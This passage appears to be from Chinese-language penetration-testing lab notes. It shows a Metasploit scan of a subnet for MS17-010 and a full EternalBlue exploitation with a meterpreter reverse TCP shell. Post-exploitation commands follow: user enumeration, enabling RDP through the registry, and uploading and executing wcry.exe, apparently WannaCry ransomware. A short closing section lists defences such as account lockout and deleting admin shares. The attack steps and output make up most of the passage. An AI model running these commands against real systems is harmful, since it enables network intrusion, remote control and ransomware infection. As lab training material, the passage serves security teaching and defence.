      [-] 192.168.50.224:445    - Rex::HostUnreachable: The host (192.168.50.224:445) was unreachable.
      [-] 192.168.50.226:445    - Rex::HostUnreachable: The host (192.168.50.226:445) was unreachable.
      [-] 192.168.50.223:445    - Rex::HostUnreachable: The host (192.168.50.223:445) was unreachable.
      [-] 192.168.50.229:445    - Rex::HostUnreachable: The host (192.168.50.229:445) was unreachable.
      [-] 192.168.50.228:445    - Rex::HostUnreachable: The host (192.168.50.228:445) was unreachable.
      [*] 192.168.50.0/24:445   - Scanned 231 of 256 hosts (90% complete)
      [-] 192.168.50.230:445    - Rex::HostUnreachable: The host (192.168.50.230:445) was unreachable.
      [-] 192.168.50.231:445    - Rex::HostUnreachable: The host (192.168.50.231:445) was unreachable.
      [-] 192.168.50.232:445    - Rex::HostUnreachable: The host (192.168.50.232:445) was unreachable.
      [-] 192.168.50.235:445    - Rex::HostUnreachable: The host (192.168.50.235:445) was unreachable.
      [-] 192.168.50.236:445    - Rex::HostUnreachable: The host (192.168.50.236:445) was unreachable.
      [-] 192.168.50.233:445    - Rex::HostUnreachable: The host (192.168.50.233:445) was unreachable.
      [-] 192.168.50.255:445    - Rex::HostUnreachable: The host (192.168.50.255:445) was unreachable.
      [+] 192.168.50.252:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (64-bit)
      [-] 192.168.50.238:445    - Rex::HostUnreachable: The host (192.168.50.238:445) was unreachable.
      [-] 192.168.50.240:445    - Rex::HostUnreachable: The host (192.168.50.240:445) was unreachable.
      [-] 192.168.50.237:445    - Rex::HostUnreachable: The host (192.168.50.237:445) was unreachable.
      [-] 192.168.50.239:445    - Rex::HostUnreachable: The host (192.168.50.239:445) was unreachable.
      [-] 192.168.50.241:445    - Rex::HostUnreachable: The host (192.168.50.241:445) was unreachable.
      [-] 192.168.50.242:445    - Rex::HostUnreachable: The host (192.168.50.242:445) was unreachable.
      [-] 192.168.50.243:445    - Rex::HostUnreachable: The host (192.168.50.243:445) was unreachable.
      [-] 192.168.50.245:445    - Rex::HostUnreachable: The host (192.168.50.245:445) was unreachable.
      [-] 192.168.50.247:445    - Rex::HostUnreachable: The host (192.168.50.247:445) was unreachable.
      [-] 192.168.50.249:445    - Rex::HostUnreachable: The host (192.168.50.249:445) was unreachable.
      [-] 192.168.50.246:445    - Rex::HostUnreachable: The host (192.168.50.246:445) was unreachable.
      [-] 192.168.50.250:445    - Rex::HostUnreachable: The host (192.168.50.250:445) was unreachable.
      [-] 192.168.50.248:445    - Rex::HostUnreachable: The host (192.168.50.248:445) was unreachable.
      [-] 192.168.50.244:445    - Rex::HostUnreachable: The host (192.168.50.244:445) was unreachable.
      [-] 192.168.50.251:445    - Rex::HostUnreachable: The host (192.168.50.251:445) was unreachable.
      [-] 192.168.50.254:445    - Rex::HostUnreachable: The host (192.168.50.254:445) was unreachable.
      [-] 192.168.50.253:445    - Rex::HostUnreachable: The host (192.168.50.253:445) was unreachable.
      [*] 192.168.50.0/24:445   - Scanned 256 of 256 hosts (100% complete)
      [*] Auxiliary module execution completed
      msf6 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
      [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
      msf6 exploit(windows/smb/ms17_010_eternalblue) > show payloads
      
      Compatible Payloads
      ===================
      
         #   Name                                                Disclosure Date  Rank    Check  Description
         -   ----                                                ---------------  ----    -----  -----------
         0   payload/generic/custom                                               normal  No     Custom Payload
         1   payload/generic/shell_bind_tcp                                       normal  No     Generic Command Shell, Bind TCP Inline
         2   payload/generic/shell_reverse_tcp                                    normal  No     Generic Command Shell, Reverse TCP Inline
         3   payload/windows/x64/exec                                             normal  No     Windows x64 Execute Command
         4   payload/windows/x64/loadlibrary                                      normal  No     Windows x64 LoadLibrary Path
         5   payload/windows/x64/messagebox                                       normal  No     Windows MessageBox x64
         6   payload/windows/x64/meterpreter/bind_ipv6_tcp                        normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
         7   payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
         8   payload/windows/x64/meterpreter/bind_named_pipe                      normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
         9   payload/windows/x64/meterpreter/bind_tcp                             normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
         10  payload/windows/x64/meterpreter/bind_tcp_rc4                         normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
         11  payload/windows/x64/meterpreter/bind_tcp_uuid                        normal  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
         12  payload/windows/x64/meterpreter/reverse_http                         normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
         13  payload/windows/x64/meterpreter/reverse_https                        normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
         14  payload/windows/x64/meterpreter/reverse_named_pipe                   normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
         15  payload/windows/x64/meterpreter/reverse_tcp                          normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
         16  payload/windows/x64/meterpreter/reverse_tcp_rc4                      normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
         17  payload/windows/x64/meterpreter/reverse_tcp_uuid                     normal  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
         18  payload/windows/x64/meterpreter/reverse_winhttp                      normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
         19  payload/windows/x64/meterpreter/reverse_winhttps                     normal  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
         20  payload/windows/x64/peinject/bind_ipv6_tcp                           normal  No     Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager
         21  payload/windows/x64/peinject/bind_ipv6_tcp_uuid                      normal  No     Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support
         22  payload/windows/x64/peinject/bind_named_pipe                         normal  No     Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager
         23  payload/windows/x64/peinject/bind_tcp                                normal  No     Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager
         24  payload/windows/x64/peinject/bind_tcp_rc4                            normal  No     Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
         25  payload/windows/x64/peinject/bind_tcp_uuid                           normal  No     Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)
         26  payload/windows/x64/peinject/reverse_named_pipe                      normal  No     Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager
         27  payload/windows/x64/peinject/reverse_tcp                             normal  No     Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager
         28  payload/windows/x64/peinject/reverse_tcp_rc4                         normal  No     Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
         29  payload/windows/x64/peinject/reverse_tcp_uuid                        normal  No     Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)
         30  payload/windows/x64/pingback_reverse_tcp                             normal  No     Windows x64 Pingback, Reverse TCP Inline
         31  payload/windows/x64/powershell_bind_tcp                              normal  No     Windows Interactive Powershell Session, Bind TCP
         32  payload/windows/x64/powershell_reverse_tcp                           normal  No     Windows Interactive Powershell Session, Reverse TCP
         33  payload/windows/x64/shell/bind_ipv6_tcp                              normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
         34  payload/windows/x64/shell/bind_ipv6_tcp_uuid                         normal  No     Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
         35  payload/windows/x64/shell/bind_named_pipe                            normal  No     Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
         36  payload/windows/x64/shell/bind_tcp                                   normal  No     Windows x64 Command Shell, Windows x64 Bind TCP Stager
         37  payload/windows/x64/shell/bind_tcp_rc4                               normal  No     Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
         38  payload/windows/x64/shell/bind_tcp_uuid                              normal  No     Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
         39  payload/windows/x64/shell/reverse_tcp                                normal  No     Windows x64 Command Shell, Windows x64 Reverse TCP Stager
         40  payload/windows/x64/shell/reverse_tcp_rc4                            normal  No     Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
         41  payload/windows/x64/shell/reverse_tcp_uuid                           normal  No     Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
         42  payload/windows/x64/shell_bind_tcp                                   normal  No     Windows x64 Command Shell, Bind TCP Inline
         43  payload/windows/x64/shell_reverse_tcp                                normal  No     Windows x64 Command Shell, Reverse TCP Inline
         44  payload/windows/x64/vncinject/bind_ipv6_tcp                          normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
         45  payload/windows/x64/vncinject/bind_ipv6_tcp_uuid                     normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
         46  payload/windows/x64/vncinject/bind_named_pipe                        normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager
         47  payload/windows/x64/vncinject/bind_tcp                               normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
         48  payload/windows/x64/vncinject/bind_tcp_rc4                           normal  No     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
         49  payload/windows/x64/vncinject/bind_tcp_uuid                          normal  No     Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
         50  payload/windows/x64/vncinject/reverse_http                           normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
         51  payload/windows/x64/vncinject/reverse_https                          normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
         52  payload/windows/x64/vncinject/reverse_tcp                            normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
         53  payload/windows/x64/vncinject/reverse_tcp_rc4                        normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
         54  payload/windows/x64/vncinject/reverse_tcp_uuid                       normal  No     Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
         55  payload/windows/x64/vncinject/reverse_winhttp                        normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
         56  payload/windows/x64/vncinject/reverse_winhttps                       normal  No     Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
      
      msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload payload/windows/x64/meterpreter/reverse_tcp
      payload => windows/x64/meterpreter/reverse_tcp
      msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.50.252
      rhost => 192.168.50.252
      msf6 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.50.153
      lhost => 192.168.50.153
      msf6 exploit(windows/smb/ms17_010_eternalblue) > run
      
      [*] Started reverse TCP handler on 192.168.50.153:4444
      [*] 192.168.50.252:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
      [+] 192.168.50.252:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (64-bit)
      [*] 192.168.50.252:445    - Scanned 1 of 1 hosts (100% complete)
      [+] 192.168.50.252:445 - The target is vulnerable.
      [*] 192.168.50.252:445 - Connecting to target for exploitation.
      [+] 192.168.50.252:445 - Connection established for exploitation.
      [+] 192.168.50.252:445 - Target OS selected valid for OS indicated by SMB reply
      [*] 192.168.50.252:445 - CORE raw buffer dump (53 bytes)
      [*] 192.168.50.252:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
      [*] 192.168.50.252:445 - 0x00000010  30 30 38 20 52 32 20 44 61 74 61 63 65 6e 74 65  008 R2 Datacente
      [*] 192.168.50.252:445 - 0x00000020  72 20 37 36 30 31 20 53 65 72 76 69 63 65 20 50  r 7601 Service P
      [*] 192.168.50.252:445 - 0x00000030  61 63 6b 20 31                                   ack 1
      [+] 192.168.50.252:445 - Target arch selected valid for arch indicated by DCE/RPC reply
      [*] 192.168.50.252:445 - Trying exploit with 12 Groom Allocations.
      [*] 192.168.50.252:445 - Sending all but last fragment of exploit packet
      [*] 192.168.50.252:445 - Starting non-paged pool grooming
      [+] 192.168.50.252:445 - Sending SMBv2 buffers
      [+] 192.168.50.252:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
      [*] 192.168.50.252:445 - Sending final SMBv2 buffers.
      [*] 192.168.50.252:445 - Sending last fragment of exploit packet!
      [*] 192.168.50.252:445 - Receiving response from exploit packet
      [+] 192.168.50.252:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
      [*] 192.168.50.252:445 - Sending egg to corrupted connection.
      [*] 192.168.50.252:445 - Triggering free of corrupted buffer.
      [*] Sending stage (200262 bytes) to 192.168.50.252
      [*] Meterpreter session 1 opened (192.168.50.153:4444 -> 192.168.50.252:49159) at 2023-09-26 16:54:26 +0800
      [+] 192.168.50.252:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
      [+] 192.168.50.252:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
      [+] 192.168.50.252:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
      
      meterpreter > sysinfo
      Computer        : WIN-H42D9A3N5M3
      OS              : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
      Architecture    : x64
      System Language : zh_CN
      Domain          : WORKGROUP
      Logged On Users : 2
      Meterpreter     : x64/windows
      meterpreter > ipconfig
      
      Interface  1
      ============
      Name         : Software Loopback Interface 1
      Hardware MAC : 00:00:00:00:00:00
      MTU          : 4294967295
      IPv4 Address : 127.0.0.1
      IPv4 Netmask : 255.0.0.0
      IPv6 Address : ::1
      IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
      
      
      Interface 11
      ============
      Name         : Intel(R) PRO/1000 MT Network Connection
      Hardware MAC : 00:0c:29:92:c2:44
      MTU          : 1500
      IPv4 Address : 192.168.50.252
      IPv4 Netmask : 255.255.255.0
      IPv6 Address : fe80::742a:8f0e:f788:d1a5
      IPv6 Netmask : ffff:ffff:ffff:ffff::
      
      
      Interface 12
      ============
      Name         : Microsoft ISATAP Adapter
      Hardware MAC : 00:00:00:00:00:00
      MTU          : 1280
      IPv6 Address : fe80::5efe:c0a8:32fc
      IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff
      
      meterpreter > shell
      Process 1288 created.
      Channel 1 created.
      Microsoft Windows [�汾 6.1.7601]
      ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
      
      C:\Windows\system32>net user
      net user
      
      \\ ���û��ʻ�
      
      -------------------------------------------------------------------------------
      Administrator            EricWee                  Guest
      �����������ϣ�������һ��������������
      
      
      C:\Windows\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
      REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
      �����ɹ����ɡ�
      
      C:\Windows\system32>exit
      exit
      meterpreter > backgroud
      [-] Unknown command: backgroud
      meterpreter > background
      [*] Backgrounding session 1...
      msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 1
      [*] Starting interaction with 1...
      
      meterpreter > upload /home/kali/Downloads/wcry.ext C:\\
      [-] Error running command upload: Errno::ENOENT No such file or directory @ rb_file_s_stat - /home/kali/Downloads/wcry.ext
      meterpreter > upload /home/kali/Downloads/wcry.exe C:\\
      [*] uploading  : /home/kali/Downloads/wcry.exe -> C:\
      [*] uploaded   : /home/kali/Downloads/wcry.exe -> C:\\wcry.exe
      meterpreter > execute -f c:\\wcry.exe
      

      从Linux远程登录windows系统

      rdesktop 192.168.50.252
      

      

  • 防御技术

    • 探测和扫描防护 - 使用防火墙来判断访问行为是否是扫描，如果判断是，则拒绝所有访问

    • 暴力破解防护

      • 设置账户登录失败的锁定策略
      • 增加图形验证码
      • 增强密码强度，定期更改密码
      • 使用双因素认证

    • 危险服务的防护

      • 在无绝对必要的情况下，尽量关闭风险服务

      • RDP - 使用ACL只允许网管机登陆

      • Telnet - 建议使用SSH来代替

      • SSH - 使用密码+公钥文件的方式来验证登录 - 可以使用SecureCRT生成公钥文件

      • SMB - 关闭默认隐藏共享 ，重启后服务器自动共享

        net share
        
        net share C$ del
        
        net share admin$ del
        
        上面的脚本创建sharedel.bat, 在本地组策略编辑器中（gpedit.msc)，用户开机后自动执行这个脚本。